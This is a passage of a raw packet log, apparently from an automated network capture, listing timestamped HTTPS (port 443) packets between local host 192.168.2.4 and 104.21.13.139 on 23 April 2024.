                                                  Apr 23, 2024 14:44:57.460953951 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.460967064 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.461025953 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.461030960 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.461064100 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.462721109 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.462735891 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.462798119 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.462804079 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.462835073 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.464454889 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.464473009 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.464510918 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.464514971 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.464541912 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.464559078 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.465831995 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.465851068 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.465889931 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.465897083 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.465919018 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.465936899 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.468458891 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.468472958 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.468521118 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.468527079 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.468560934 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.470305920 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.470319986 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.470367908 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.470371962 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.470401049 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.471975088 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.471993923 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.472035885 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.472039938 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.472073078 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.473679066 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.473697901 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.473746061 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.473752022 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.473783970 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.510654926 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.510677099 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.510723114 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.510740042 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.510756969 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.510776043 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.512445927 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.512465000 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.512502909 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.512510061 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.512537003 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.512553930 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.514178038 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.514210939 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.514238119 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.514244080 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.514276028 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.516664982 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.516680002 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.516731977 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.516736984 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.516769886 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.536393881 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.536408901 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.536464930 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.536489964 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.536528111 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.538158894 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.538172007 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.538245916 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.538252115 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.538290024 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.539892912 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.539911985 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.539953947 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.539959908 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.539988041 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.540003061 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.541675091 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.541688919 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.541728020 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.541733980 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.541760921 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.541796923 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.543529034 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.543544054 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.543577909 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.543582916 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.543615103 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.543636084 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.545655966 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.545671940 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.545720100 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.545726061 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.545763016 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.547426939 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.547446966 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.547482014 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.547487974 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.547513008 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.547528028 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.549218893 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.549232960 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.549287081 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.549295902 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.549335003 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.550940990 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.550956964 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.550991058 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.550997019 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.551023960 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.551042080 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.552848101 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.552862883 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.552915096 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.552922010 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.552958965 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.554977894 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.554991961 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.555037022 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.555046082 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.555083036 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.556781054 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.556799889 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.556829929 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.556834936 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.556862116 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.556880951 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.558556080 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.558569908 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.558624029 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.558629990 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.558670998 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.560307980 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.560322046 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.560362101 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.560367107 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.560391903 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.560410976 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.562819004 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.562834024 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.562892914 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.562900066 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.562937975 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.564269066 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.564285040 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.564337015 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.564343929 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.564392090 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.565970898 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.565984964 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.566032887 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.566039085 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.566076994 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.567747116 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.567759991 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.567796946 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.567802906 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.567828894 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.567845106 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.569547892 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.569566965 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.569611073 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.569617033 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.569644928 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.569664001 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.571414948 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.571428061 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.571474075 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.571491003 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.571532965 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.572942019 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.572954893 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.573003054 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.573023081 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.573059082 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.574641943 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.574656010 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.574695110 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.574712992 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.574726105 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.574748039 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.576333046 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.576347113 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.576390028 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.576396942 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.576432943 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.578036070 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.578051090 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.578095913 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.578103065 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.578135014 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.579278946 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.579298973 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.579328060 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.579340935 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.579360008 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.579376936 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.581006050 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.581018925 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.581069946 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.581091881 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.581126928 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.582158089 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.582170963 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.582211971 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.582221985 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.582257986 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.583921909 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.583935022 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.583972931 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.583988905 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.584028006 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.585707903 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.585721016 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.585767984 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.585777044 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.585810900 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.586736917 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.586756945 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.586786032 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.586795092 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.586807013 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.586826086 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.588746071 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.588758945 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.588809013 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.588819027 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.588859081 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.589895964 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.589919090 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.589942932 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.589950085 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.589962959 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.589984894 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.591639996 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.591653109 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.591701031 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.591707945 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.591743946 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.592767954 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.592781067 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.592812061 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.592817068 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.592829943 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.592855930 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.594547033 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.594561100 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.594593048 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.594598055 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.594613075 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.594635010 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.596261978 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.596276999 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.596328974 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.596334934 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.596370935 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.597735882 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.597749949 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.597784996 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.597790003 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.597805977 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.597826004 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.598737955 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.598766088 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.598795891 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.598799944 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.598813057 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.598836899 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.600622892 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.600636959 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.600678921 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.600692987 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.600728989 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.602315903 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.602330923 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.602374077 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.602380991 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.602416039 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.603657007 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.603669882 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.603728056 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.603734016 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.603768110 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.604863882 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.604877949 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.604919910 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.604924917 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.604964018 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.606611013 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.606623888 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.606663942 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.606667995 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.606678009 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.606700897 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.608283997 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.608298063 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.608335972 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.608340025 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.608362913 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.608378887 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.609473944 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.609494925 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.609527111 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.609533072 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.609550953 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.609566927 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.611176014 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.611190081 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.611232042 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.611236095 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.611279011 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.612597942 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.612622023 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.612643003 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.612648010 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.612667084 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.612688065 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.614387989 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.614402056 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.614442110 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.614448071 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.614455938 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.614481926 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.615544081 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.615561962 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.615588903 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.615592957 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:57.615612984 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.615632057 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:57.617182970 CEST44349738104.21.13.139192.168.2.4
